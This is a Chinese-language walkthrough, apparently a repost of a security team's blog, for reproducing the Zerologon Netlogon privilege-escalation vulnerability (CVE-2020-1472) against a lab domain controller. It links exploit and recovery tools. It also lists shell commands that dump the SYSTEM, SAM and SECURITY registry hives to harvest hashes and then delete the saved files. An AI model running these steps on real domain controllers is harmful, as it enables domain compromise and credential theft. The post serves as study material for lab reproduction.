前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >CVE-2020-1472

CVE-2020-1472

作者头像
Khan安全团队
发布2020-09-18 15:36:37
发布2020-09-18 15:36:37
5590
举报
文章被收录于专栏:Khan安全团队Khan安全团队

0x00 CVE-2020-1472复现

NetLogon 特权提升漏洞

NetLogon组件 是 Windows 上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。

当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。

环境:

1.攻击机kali2020

2.靶机win2008r2---ip:192.168.124.141---主机名字:dc-01 ---域名:test.com

3.复现工具:https://github.com/dirkjanm/CVE-2020-1472

4.所需环境:python3+impacket包https://github.com/SecureAuthCorp/impacket

5.恢复工具:https://github.com/risksense/zerologon

0x01 复现过程

  1. 下载复现工具,进行检验

2.获取hash值

安装impacket包

需要使用如下步骤:

git clonehttps://github.com/CoreSecurity/impacket.git

cd impacket/

python setup.py install

在刚才下载的包里面

impacket-master/examples

获取空口令

获取hash值

3. 获取shell

4. 获取域控的原始NT哈希

先在shell中执行以下命令,获取域控账户的注册表文件

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

get system.save

get sam.save

get security.save

del /f system.save

del /f sam.save

del /f security.save

在执行以下命令获取原始NT哈希

0x02.恢复

恢复脚本:https://github.com/risksense/zerologon

恢复需要使用哈希使用$MACHINE.ACC: 后的参数

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-09-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档